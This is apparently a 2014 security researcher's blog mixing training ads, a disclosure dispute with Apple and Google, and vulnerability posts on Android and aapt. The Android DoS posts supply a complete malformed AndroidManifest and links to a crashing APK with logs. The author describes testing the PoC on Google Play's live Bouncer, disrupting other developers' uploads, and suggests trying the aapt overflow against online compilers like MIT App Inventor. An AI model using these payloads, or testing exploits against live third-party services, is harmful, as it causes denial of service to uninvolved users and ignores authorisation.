Featured Posts

<< >>

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar, Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi. www.balicbilisim.com Android Temelleri Android Malware Analizi Android Adli-Bilişim Mac OS X ve iOS Temelleri Web Penetrasyon Testleri Mobil Penetrasyon Testleri Linux Temelleri

Windows Directory Bug

Hi Guys, I’d like to share a weird story with you. Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows

Siber Güvenlik Konferansı 2014 İstanbul

Siber Güvenlik Konferansı 2014 İstanbul Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu

New generation brute force attacks

Hi guys, Soon I will be sharing a method for brute force attacks. I tested on most of the big companies(Apple, Google, Microsoft etc.) which it worked well. I tried

Android Eğitimi

Merhaba arkadaşlar, Android OS & Android Uygulama geliştirme eğitimimiz devam ediyor. Eğitim Tarihleri: 26 Nisan Cumartesi – 27 Nisan Pazar 2014 (1. sınıf) Eğitim Yeri : Atalar(kartal) / İstanbul Eğitim

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar,

Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi.

www.balicbilisim.com

Windows Directory Bug

Hi Guys,

I’d like to share a weird story with you.

Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows Sever 2008 R2 (x64). I think they are present in all versions of its windows OS.

However Im not certain why this issue occured but I think it minght be related with NTFS.

Due to this issue the created folders are unable to be deleted.

mkdir “test /. /test”

windows_1

windows_2

windows_3

windows_4

if you created a file in folder, same file gets created in both folder also if any one of the folder is deleted, remaing file get corrupted.

windows_5

windows_6

Siber Güvenlik Konferansı 2014 İstanbul

https://lh6.googleusercontent.com/-rVac6pQsrRE/UoyzBYokSbI/AAAAAAAADmQ/-V5xJYnhVPQ/w140-h133-p/SGD-LOGO-RGB.jpg
Siber Güvenlik Konferansı 2014 İstanbul

Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur. Siber Güvenlik Derneği tarafından düzenlenecek olan Siber Güvenlik Konferansı bu eksendeki soru ve sorunlara çözüm önerileri sunmayı hedeflemektedir.

http://www.siberguvenlikkonferansi.org/

 

New generation brute force attacks

Hi guys,

Soon I will be sharing a method for brute force attacks. I tested on most of the big companies(Apple, Google, Microsoft etc.) which it worked well. I tried on over 20.000+ times password on any account and there seemed to be no problem occurring.

I have reported this issues to Google and Apple so i will be sharing these information’s when I get a reply from those companies and when its fixed.(i will not report to microsoft because they gave a bad experience to me in the past..)

I believe that many other company’s system has the same issue which must be fixed soon as possible.

For now I only have a response from google, i will publish it when i hear from apple.
googlePermissions

Android Eğitimi

Merhaba arkadaşlar,

Android OS & Android Uygulama geliştirme eğitimimiz devam ediyor.

Eğitim Tarihleri:
26 Nisan Cumartesi – 27 Nisan Pazar 2014 (1. sınıf)
Eğitim Yeri :
Atalar(kartal) / İstanbul
Eğitim Katılım Ücreti :
700 TL  (1 kişi )

iletişim :
ibrahim@balicbilisim.com
+90216 387 87 99
+90538 722 33 73

 

1. Android’e Genel Bakış.
2. Android Nedir?
3. Android Mimarisi
3.1.1. Android Internals
3.1.1.1.1. Applications
3.1.1.1.2. Application Framework
3.1.1.1.3. Libraries
3.1.1.1.4. Android Runtime(Core Libraries & Dalvik & ART )
3.1.1.1.5. Linux Kernel
3.1.2. Android APIs
3.1.2.1.1. PackageManager
3.1.2.1.2. Power Manager
3.1.2.1.3. Activity Manager
3.1.2.1.4. Alarm Manager
3.1.2.1.5. Window Manger
3.1.2.1.6. Bluetooth Service
3.1.2.1.7. Location Manager
3.1.2.1.8. Telephony Manager
3.1.2.1.9. ….
3.1.3. Android Data Storages
3.1.3.1.1. Internal Storage
3.1.3.1.2. External Storage
3.1.3.1.3. Shared Preferences
3.1.3.1.4. Network
3.1.3.1.5. SQLite
3.1.3.1.6. ..
4. Lab Ortamının Kurulumu & Ayarları
4.1.1. Ortam Araçları
4.1.1.1.1. Android SDK
4.1.1.1.2. Eclipse
4.1.1.1.3. Intellij IDEA
4.1.2. Android Tools & Debugging
4.1.2.1.1. Android Debug Bridge ( adb )
4.1.2.1.2. Android Asset Packaging Tool ( aapt )
4.1.2.1.3. Dalvik Debug Monitor Server ( ddms )
4.1.2.1.4. Network Trafik Analizi
4.1.2.1.5. Logcat, Dumpsys
5. Egzersiz
5.1.1. 3 Adet Uygulama Geliştirme
5.1.2. 3 Adet Uygulama Analiz

 

* Eğitime katılacak öğrencilerin kimlik kartları ile birlikte gelmeleri şartıyla katılım ücretinde %40 indirim uygulanacaktır.
** Her sınıf için 1 kişilik ücretsiz öğrenci kontenjanımız vardır.(maddi durumu iyi olmayan arkadaşlar için)
*** Eğitime katılacak katılımcıların1 adet windows işletim yüklü taşınabilir bilgisayar getirmeleri zorunludur.

Göya Apple ve Google Yalanlamış?

Bazı kişi ve kişiler adıma karşı uzun zamandır karalama kampanyası başlattılar. Yaptıklarıma karşı yalan yanlış, kaynak belirtmeksizin birşeyler yazıp ciziyorlar. Onlara sadece gülüyorum.

Öncelikle apple ile alakalı olarak kesinlikle belirtmek istiyorum ki Apple şirketi konuya karşı “iyi” yada “kötü” hiç bir resmi açılamada bulunmadı.

Apple şirketi prösedür’ü gereği resmi olarak sadece şu sayfada http://support.apple.com/kb/ht1318 ilgili zafiyeti bildiren kişilerin adını ve zafiyetin türünü belirtmektedir.

Bunları ben değil, Apple söylüyor;

2013-07-29 iCloud.com/mail

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 developer.apple.com

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 itunesconnect.apple.com

Nine stored cross-site scripting issues were addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting these issues.

2013-07-23 iCloud.com/calendar

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-22 iadworkbench.apple.com

An information disclosure issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

 

Şu günlerde ise bu insanlar aynı karalama kampanyasını Google şirketi için başlattılar.
Allah aşkına soruyorum, söylesinler; Google şirketi bu açıklamaları nerede yapmış? bana kaynak göstersinler yeter…

Herkes çok iyi hatırlar ki, Olayı ben değil Apple şirketi kendi duyurmuştu ve O günlerde Apple şirketi kendi kullanıcılarına kendisi şu emaili göndermişti.

appleolayi

 

Burada açıkca görüldüğü üzere Apple ilgili olayda uygulama geliştirici(developer)’in adının(name), soyadının(surname), email id ve apple idlerine ulaşıldığını şifrelerin güven altında olduğunu açıklamıştı.

Bunların hiç birini ben söylemedim, Apple şirketi kendisi bildirmişti.

Ben olayı ve tüm bu süreçte ulaştığım o belgeleri bu video’da paylaşmıştım.

Bu video’yada açıkca gözüktüğü gibi konuyla alakalı olarak benim ulaştığım Ad,soyad ve apple idleri açıkca görebilirsiniz.

Ama bazı kötü niyetli kişiler,özelliklede hiç bir kaynak göstermeksizin hiç bir mantıklı açıklama yapmaksızın adıma karşı karalama kampanyası yürütüyorlar. Yaptıkları açıklamada Apple şirketinin durumu inkar ettiğini dile getiriyorlar, Şayet böyle bir resmi kaynakları varsa bunu herkesle paylaşmaları gerekiyor aksi takdirde kaynak göstermeksizin bu tip söylemlerde bulunmalarının hiç bir mantikli açıklaması bulunmamaktadır.

Yine bazı kişiler kaynak göstermeksizin bu olayın code execution’dan olayı kaynaklandığını belirtiyorlar, Eğer code execution’ın zafiyeti ile neler yapılabileneceğini biliyor olsaydınız emin olun Code Execution gerçekleştirilen bir sunucuda kullanıcı adı, soyadı ve email adreslerinin alınmayacağını çok iyi bilirler. (şayet apple şirketi kullanıcı bilgilerini plain text olarak metin belgesinin içinde saklamıyorsa… lol)

Code Execution gerçekleştirmek demek o sunucuda kod çalıştırabilmek demektir. Tabikide bu tip zafiyetler çok tehlikeli olabilmektedir fakat bunu gerçekleştiren kişi komple server’ın kontrolünü ele geçirebilir sadece ad,soyad,email adresi almaz vs vs.

Apple olayı geçti gitti bu karalama yapanların kıskançlıkları dindi derken üstüne google olayı ile yine kudurdular, Google Olayı inkar etti diyorlar… Allah aşkına google nerede ve ne zaman açıklama yapmış? Ne demiş bir açıklasınlarda tüm dünya bilse?

Google konu ile alakalı “sorunlar giderildi dışında” hiçbir resmi açıklama yapmamıştır.

https://support.google.com/googleplay/android-developer/known-issues/24493?hl=en

Sadece ilgili sorunların giderildiğini açıklamıştır bunun dışında hiç bir açıklamada bulunulmadı. Ben konuyu, konuyla alakalı tüm kanıtları ortaya koydum.

Google için yaptığım zafiyet bildirimi, rapor idsi ve tarihini buradan açıkca görebilirsiniz.

 

asdasdas

 

Olayların başlangıç tarihini ve insanların yazdıkları yorumları buradan görebilirsiniz:

https://code.google.com/p/android/issues/detail?id=67226

 

Aksini kanıtlayacak veya iddaa edicek herkes için ben burdayim fakat yalan yanlış hiç bir kaynak belirtmeksizin yaptıkları saldırıların sadece ve sadece tek amacı vardır oda karalamaktır.

İbrahim

Android Asset Packaging Tool (aapt) BoF

Hi guys,

I’ve discovered a vulnerability in aapt(Android Asset Packaging Tool) which causes a possible memory corruption.

The cause of the bugs is the namespace attributes value length. e.g. :  android:sharedUserLabel=”22007+ chars”

if you set any attribute value in AndroidManifest.xml and set as big long value (22007+ chars) try to compiling via aapt your project. triggers the bug.

command line:
aapt package -v -f -M [Projectpath]\AndroidManifest.xml -S [projectpath]\res -I [AndroidSDK]\platforms\android-19\android.jar -F [Projectpath]\AndroidTest.apk

afafa

 

 

AndroidManifest.xml içerisinde herhangi bir girdinin (örnek olarak ben “android:sharedUserLabel=” kullandım) değerini, 22007+ ve fazlası olarak tanımlarsanız ve bu projeyi aapt ile derlemeye çalışırsanız hatayı tetikleyebilirsiniz.

eğer exploit edebilirseniz online compiling işlemi yapan serverlarda deneme şansınız olabilir ( :

(örnek olarak http://appinventor.mit.edu/explore/ )

mit

crash özeti:

eax=002ed209 ebx=0028e9c4 ecx=0005e800 edx=002ed20a esi=0028f384 edi=0005e846
eip=00435837 esp=0028e9b0 ebp=0028ede8 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
aapt+0×35837:
00435837 807aff0a cmp byte ptr [edx-1],0Ah ds:002b:002ed209=??
0:000> ub .
aapt+0×35822:
00435822 53 push ebx
00435823 e8a8760500 call aapt+0x8ced0 (0048ced0)
00435828 89c7 mov edi,eax
0043582a 83c410 add esp,10h
0043582d 8d1403 lea edx,[ebx+eax]
00435830 8d42ff lea eax,[edx-1]
00435833 39c3 cmp ebx,eax
00435835 731a jae aapt+0×35851 (00435851)
0:000> ub 0028e9c4
0028e9bc 61 popad
0028e9bd 61 popad
0028e9be 61 popad
0028e9bf 61 popad
0028e9c0 61 popad
0028e9c1 61 popad
0028e9c2 61 popad
0028e9c3 61 popad

Android malformed APK DoS – Part II

Hi Guys,

I found a new DoS technique for Android Devices.

a many services continuous shuts ..

  • Launcher Service
  • Google Play Service
  • AOSP Android Keyboard
  • android.process.acore

The cause of the bugs is the “android:sharedUserLabel” and  “android:versionName” namespace attributes length in AndroidManifest.xml.

if you set the “longstring” in strings.xml and set as big long value (2322480+ chars) which triggers the bug.

<?xml version=”1.0″ encoding=”utf-8″?>
<manifest xmlns:android=”http://schemas.android.com/apk/res/android”
package=”com.balicit.GooglePlayServiceDoS”
android:sharedUserLabel=”@string/longstring”
android:versionCode=”1″
android:versionName=”@string/longstring”>
<uses-sdk android:minSdkVersion=”7″/>
<application android:label=”@string/app_name” android:icon=”@drawable/ic_launcher”>
<activity android:name=”MyActivity”
android:label=”@string/app_name”>
<intent-filter>
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
</intent-filter>
</activity>
</application>
</manifest>

 

If you want to test, Install this app and run your android device.

Download Unsigned Apk

Download Signed Apk

 

/ActivityManager(14833): START {flg=0×10000000 cmp=com.balicit.GooglePlayServiceDoS/.MyActivity u=0} from pid 26385
D/AndroidRuntime(26385): Shutting down VM
D/dalvikvm(26398): Late-enabling CheckJNI
D/dalvikvm(26385): GC_CONCURRENT freed 102K, 81% free 494K/2560K, paused 1ms+1ms, total 6ms
D/dalvikvm(26385): Debugger has detached; object registry had 1 entries
I/ActivityManager(14833): Start proc com.balicit.GooglePlayServiceDoS for activity com.balicit.GooglePlayServiceDoS/.MyActivity: pid=26398 uid=10088 gids={1015, 1028}
I/AndroidRuntime(26385): NOTE: attach of thread ‘Binder_3′ failed
E/Trace (26398): error opening trace file: No such file or directory (2)
E/JavaBinder(26398): !!! FAILED BINDER TRANSACTION !!!
D/AndroidRuntime(26398): Shutting down VM
W/dalvikvm(26398): threadid=1: thread exiting with uncaught exception (group=0x40d782a0)
E/AndroidRuntime(26398): FATAL EXCEPTION: main
E/AndroidRuntime(26398): java.lang.AssertionError: android.os.TransactionTooLargeException
E/AndroidRuntime(26398): at android.app.LoadedApk.initializeJavaContextClassLoader(LoadedApk.java:363)
E/AndroidRuntime(26398): at android.app.LoadedApk.getClassLoader(LoadedApk.java:320)
E/AndroidRuntime(26398): at android.app.LoadedApk.makeApplication(LoadedApk.java:493)
E/AndroidRuntime(26398): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4124)
E/AndroidRuntime(26398): at android.app.ActivityThread.access$1300(ActivityThread.java:130)
E/AndroidRuntime(26398): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1255)
E/AndroidRuntime(26398): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime(26398): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26398): at android.app.ActivityThread.main(ActivityThread.java:4745)
E/AndroidRuntime(26398): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime(26398): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime(26398): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:786)
E/AndroidRuntime(26398): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:553)
E/AndroidRuntime(26398): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime(26398): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26398): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26398): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26398): at android.app.LoadedApk.initializeJavaContextClassLoader(LoadedApk.java:361)
E/AndroidRuntime(26398): … 13 more
W/ActivityManager(14833): Force finishing activity com.balicit.GooglePlayServiceDoS/.MyActivity
I/Icing (26147): Internal init done: storage state 0
I/Icing (26147): Post-init done
E/JavaBinder(26147): !!! FAILED BINDER TRANSACTION !!!
W/dalvikvm(26147): threadid=14: thread exiting with uncaught exception (group=0x40d782a0)
E/AndroidRuntime(26147): FATAL EXCEPTION: Thread-1029
E/AndroidRuntime(26147): java.lang.RuntimeException: Package manager has died
E/AndroidRuntime(26147): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:77)
E/AndroidRuntime(26147): at ecn.a(SourceFile:75)
E/AndroidRuntime(26147): at eaa.j(SourceFile:2010)
E/AndroidRuntime(26147): at eae.a(SourceFile:1958)
E/AndroidRuntime(26147): at eba.run(SourceFile:321)
E/AndroidRuntime(26147): at android.os.Handler.handleCallback(Handler.java:615)
E/AndroidRuntime(26147): at android.os.Handler.dispatchMessage(Handler.java:92)
E/AndroidRuntime(26147): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26147): at dzm.run(SourceFile:38)
E/AndroidRuntime(26147): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26147): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26147): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26147): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:72)
E/AndroidRuntime(26147): … 8 more
W/ActivityManager(14833): Activity pause timeout for ActivityRecord{41491e20 com.balicit.GooglePlayServiceDoS/.MyActivity}
I/ActivityManager(14833): START {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0×10000000 cmp=com.android.launcher/com.android.launcher2.Launcher u=0} from pid 0
D/dalvikvm(26317): GC_CONCURRENT freed 1357K, 13% free 10139K/11591K, paused 9ms+11ms, total 74ms
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +424ms (total +1s176ms)
D/audio_hw_primary(14704): out_standby(0x4008d388)
D/audio_hw_primary(14704): do_output_standby(0x4008d388)
I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL
I/Process (26147): Sending signal. PID: 26147 SIG: 9
D/audio_hw_primary(14704): select_output_device(mode=0, devices=0×40002)
D/audio_hw_primary(14704): ~~~~ select_output_device : hs=0 , hp=0, sp=2
D/audio_hw_primary(14704): speaker_on
D/audio_hw_primary(14704): start_output_stream(adev->devices=0×40002, adev->mode=0)
D/audio_hw_primary(14704): ————open on board audio——-
I/ActivityManager(14833): Process com.google.android.gms (pid 26147) has died.
W/ActivityManager(14833): Scheduling restart of crashed service com.google.android.gms/.playlog.service.PlayLogBrokerService in 5000ms
W/ActivityManager(14833): Scheduling restart of crashed service com.google.android.gms/.icing.service.IndexWorkerService in 14998ms
I/Process (26398): Sending signal. PID: 26398 SIG: 9
I/ActivityManager(14833): Process com.balicit.GooglePlayServiceDoS (pid 26398) has died.
I/Process (26317): Sending signal. PID: 26317 SIG: 9
I/WindowState(14833): WIN DEATH: Window{419e9908 com.android.launcher/com.android.launcher2.Launcher paused=false}
W/InputDispatcher(14833): channel ’419e9908 com.android.launcher/com.android.launcher2.Launcher (server)’ ~ Consumer closed input channel or an error occurred. events=0×9
E/InputDispatcher(14833): channel ’419e9908 com.android.launcher/com.android.launcher2.Launcher (server)’ ~ Channel is unrecoverably broken and will be disposed!
I/ActivityManager(14833): Process com.android.launcher (pid 26317) has died.
W/InputDispatcher(14833): Attempted to unregister already unregistered input channel ’419e9908 com.android.launcher/com.android.launcher2.Launcher (server)’
I/WindowManager(14833): WINDOW DIED Window{419e9908 com.android.launcher/com.android.launcher2.Launcher paused=false}
I/ActivityManager(14833): Start proc com.android.launcher for activity com.android.launcher/com.android.launcher2.Launcher: pid=26419 uid=10038 gids={1028}
E/Trace (26419): error opening trace file: No such file or directory (2)
I/ActivityThread(26419): Pub com.android.launcher2.settings: com.android.launcher2.LauncherProvider
D/dalvikvm(26419): GC_FOR_ALLOC freed 175K, 5% free 6260K/6535K, paused 12ms, total 12ms
D/dalvikvm(26419): GC_CONCURRENT freed 274K, 6% free 6448K/6791K, paused 1ms+2ms, total 14ms
I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL
D/dalvikvm(26419): GC_CONCURRENT freed 234K, 5% free 6728K/7047K, paused 5ms+13ms, total 70ms
D/libEGL (26419): loaded /system/lib/egl/libEGL_mali.so
D/libEGL (26419): loaded /system/lib/egl/libGLESv1_CM_mali.so
D/libEGL (26419): loaded /system/lib/egl/libGLESv2_mali.so
D/OpenGLRenderer(26419): Enabling debug mode 0
W/InputMethodManagerService(14833): Got RemoteException sending setActive(false) notification to pid 26317 uid 10038
D/dalvikvm(26419): GC_CONCURRENT freed 228K, 5% free 6917K/7239K, paused 2ms+2ms, total 17ms
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +1s55ms
W/System.err(14833): android.os.DeadObjectException
W/System.err(14833): at android.os.BinderProxy.transact(Native Method)
W/System.err(14833): at com.android.internal.widget.IRemoteViewsAdapterConnection$Stub$Proxy.onServiceDisconnected(IRemoteViewsAdapterConnection.java:101)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl$ServiceConnectionProxy.disconnect(AppWidgetServiceImpl.java:150)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl.bindRemoteViewsService(AppWidgetServiceImpl.java:643)
W/System.err(14833): at com.android.server.AppWidgetService.bindRemoteViewsService(AppWidgetService.java:230)
W/System.err(14833): at com.android.internal.appwidget.IAppWidgetService$Stub.onTransact(IAppWidgetService.java:315)
W/System.err(14833): at android.os.Binder.execTransact(Binder.java:367)
W/System.err(14833): at dalvik.system.NativeStart.run(Native Method)
D/dalvikvm(26419): GC_CONCURRENT freed 37K, 2% free 7355K/7495K, paused 3ms+3ms, total 31ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 353K, 9% free 6244K/6855K, paused 22ms, total 22ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 298K, 9% free 6255K/6855K, paused 17ms, total 18ms
D/dalvikvm(26419): GC_CONCURRENT freed 29K, 2% free 7845K/7943K, paused 3ms+2ms, total 32ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 12ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 6ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 302K, 9% free 6248K/6855K, paused 11ms, total 11ms
D/dalvikvm(26419): GC_CONCURRENT freed 49K, 2% free 8334K/8455K, paused 2ms+4ms, total 28ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 327K, 9% free 6255K/6855K, paused 11ms, total 12ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 346K, 9% free 6261K/6855K, paused 16ms, total 17ms
D/dalvikvm(26419): GC_CONCURRENT freed 54K, 2% free 8974K/9095K, paused 1ms+3ms, total 21ms
W/System.err(14833): android.os.DeadObjectException
W/System.err(14833): at android.os.BinderProxy.transact(Native Method)
W/System.err(14833): at com.android.internal.widget.IRemoteViewsAdapterConnection$Stub$Proxy.onServiceDisconnected(IRemoteViewsAdapterConnection.java:101)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl$ServiceConnectionProxy.disconnect(AppWidgetServiceImpl.java:150)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl.bindRemoteViewsService(AppWidgetServiceImpl.java:643)
W/System.err(14833): at com.android.server.AppWidgetService.bindRemoteViewsService(AppWidgetService.java:230)
W/System.err(14833): at com.android.internal.appwidget.IAppWidgetService$Stub.onTransact(IAppWidgetService.java:315)
W/System.err(14833): at android.os.Binder.execTransact(Binder.java:367)
W/System.err(14833): at dalvik.system.NativeStart.run(Native Method)
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(9): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(0): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(1): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(2): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(3): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(4): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(5): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(6): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(7): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(8): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(0): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(1): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(2): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(3): null RemoteViews returned from RemoteViewsFactory.
D/dalvikvm(26419): GC_FOR_ALLOC freed 663K, 9% free 9181K/9991K, paused 16ms, total 16ms
I/dalvikvm-heap(26419): Grow heap (frag case) to 10.011MB for 1048592-byte allocation
D/dalvikvm(26419): GC_CONCURRENT freed 21K, 9% free 10184K/11079K, paused 2ms+3ms, total 25ms
D/dalvikvm(26419): GC_CONCURRENT freed 1842K, 17% free 9714K/11655K, paused 2ms+2ms, total 21ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 4ms
D/dalvikvm(26419): GC_FOR_ALLOC freed 231K, 16% free 9808K/11655K, paused 15ms, total 15ms
D/dalvikvm(26419): GC_CONCURRENT freed 1065K, 16% free 9894K/11655K, paused 3ms+4ms, total 29ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 6ms
E/JavaBinder(26419): !!! FAILED BINDER TRANSACTION !!!
W/dalvikvm(26419): threadid=10: thread exiting with uncaught exception (group=0x40d782a0)
D/dalvikvm(26419): GC_CONCURRENT freed 1103K, 15% free 9976K/11655K, paused 3ms+5ms, total 122ms
E/AndroidRuntime(26419): FATAL EXCEPTION: launcher-loader
E/AndroidRuntime(26419): java.lang.RuntimeException: Package manager has died
E/AndroidRuntime(26419): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:77)
E/AndroidRuntime(26419): at com.android.launcher2.ApplicationInfo.<init>(ApplicationInfo.java:88)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.loadAllAppsByBatch(LauncherModel.java:1773)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.loadAndBindAllApps(LauncherModel.java:1665)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.run(LauncherModel.java:979)
E/AndroidRuntime(26419): at android.os.Handler.handleCallback(Handler.java:615)
E/AndroidRuntime(26419): at android.os.Handler.dispatchMessage(Handler.java:92)
E/AndroidRuntime(26419): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26419): at android.os.HandlerThread.run(HandlerThread.java:60)
E/AndroidRuntime(26419): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26419): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26419): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26419): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:72)
E/AndroidRuntime(26419): … 8 more
W/ActivityManager(14833): Force finishing activity com.android.launcher/com.android.launcher2.Launcher
I/ActivityManager(14833): START {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0×10000000 cmp=com.android.launcher/com.android.launcher2.Launcher u=0} from pid 0
D/audio_hw_primary(14704): out_standby(0x4008d388)
D/audio_hw_primary(14704): do_output_standby(0x4008d388)
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +393ms

Android Vulnerability affected Google Play Bouncer (Emulator)

Hi all,
I’d like to share a funny story with you.

I’ve discovered a vulnerability in Android which causes a possible memory corruption.
I think all android versions are affected by this vulnerability.
I successfully confirmed that it affects Android 4.2.2 , 4.3 and 2.3
I reported the vulnerability to Google Security and my report id is “67213″
Executing a malformed APK file triggers the vulnerability and it causes DoS and device becomes freezed.
I really didn’t want to cause any damage but I couldn’t stop my feelings and I wanted to test it on Google’s Android Bouncer by uploading the malformed APK to Google Play
Then I realized that it caused Denial of Service on Google Play!
Because I started to get some errors from Google Play!
After some google-ing , I see that many people couldn’t be able to upload their APPs to Google Play during my test!
I think it was probably because of testing my PoC exploit on Google Play
Here is a short info about the vuln : http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
The error that I get from Google Play after uploading my PoC exploit:
https://pbs.twimg.com/media/Bi011zvCUAABGo-.png:large

And some people who gets same error during my test:
https://code.google.com/p/android/issues/detail?id=67226&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars#makechanges

P.S. sorry for poor english guys!!!

Android OS Memory Corruption Bug

 

Update: 
THIS VULN CAUSED DoS on GOOGLE PLAY. Nobody can upload APK for 2 days!! more info:

http://ibrahimbalic.com/2014/android-vulnerability-affected-google-play-bouncer-emulator/

 

Hi guys,

This week I tried hard on Android (tools and os) by fuzzing and I found a Android OS memory corruption bugs and Android Debug Bridge (adb.exe) BOF.

This android os bug causes memory corruption and shuts the android os.

I tested on Android 4.2.2, Android 4.3, Android 2.3 versions the result seems to be the same every attempt.

The cause of the bugs is the “appname” length. if you set the appname in strings.xml and set as big long value (387000+ chars) which triggers the bug.

If you want to test, Install this app and run your android device.

download apk

 

I/DEBUG (12909): pid: 13049, tid: 13079, name: WindowManager >>> system_server <<<
I/DEBUG (12909): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 5fbfe000
I/DEBUG (12909): r0 5fbfdfd8 r1 6584ae58 r2 005ffb80 r3 3acb31c0
I/DEBUG (12909): r4 601fdbf0 r5 5fb771d8 r6 5c6a5af8 r7 5c19ea88
I/DEBUG (12909): r8 00000000 r9 001a1a80 sl 00000000 fp 42375618
I/DEBUG (12909): ip 5fb771d8 sp 5fb77190 lr 401d0613 pc 400f8210 cpsr 20000010
I/DEBUG (12909): d0 4100000041000000 d1 4100000041000000
